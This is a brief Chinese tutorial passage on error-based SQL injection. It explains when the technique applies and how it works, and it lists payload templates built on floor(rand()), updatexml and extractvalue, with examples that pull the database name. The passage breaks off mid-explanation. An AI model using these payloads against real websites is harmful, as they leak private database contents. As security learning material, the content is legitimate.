注入
1、使用场景
在我们学习sql注入的时候,有的界面没有回显,这样一般的注入方式我们就无法使用,在这种情况下,我们就可以通过报错注入的方式,通过报错查询显示我们所要得到的数据
2、原理
数据库在执行sql语句的时候,首先会对sql进行检测,如果sql语句存在问题就会返回报错信息,通过这种机制我们可以构造sql,触发数据库的报错,在报错中存在我们想要的信息
3、常用函数
floor()、updatexml()、extractvalue()
4、常用的模板
concat((你的sql语句),0x7e,floor(rand(0)*2))、updatexml(1,concat(0x7e,(你的sql代码),0x7e),1)和extractvalue('anything',concat('~',(你的sql代码)))
concat((select database()),0x7e,floor(rand(0)*2))
updatexml(1,concat(0x7e,(select database()),0x7e),1)
extractvalue('anything',concat('~',(select database())))
解释下上面用到的floor(X)函数和r